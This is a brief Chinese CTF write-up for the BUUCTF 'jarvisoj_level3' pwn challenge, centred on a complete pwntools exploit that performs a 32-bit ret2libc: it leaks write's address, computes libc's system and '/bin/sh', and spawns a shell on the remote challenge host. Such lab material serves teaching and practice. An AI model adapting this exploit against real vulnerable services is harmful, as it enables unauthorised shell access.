BUUCTF-jarvisoj_level3

checksec

IDA

main

 

很明显的溢出点

再没有其它有用的信息,而且本题没有system,bin/sh

既然如此,解决思路就有了,泄露libc,32位的ret2libc3 

EXP

from pwn import *

#start 
r=remote("node4.buuoj.cn",25236)
# r = process("../buu/jarvisoj_level3")
elf = ELF("./29level3")
libc = ELF("./libc-2.23-32.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack 
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendlineafter(b"Input:\n",payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter(b"Input:\n",payload)

r.interactive()

利用write函数泄露libc版本

计算libc基址，算出system和bin/sh在程序里的地址,最后getshell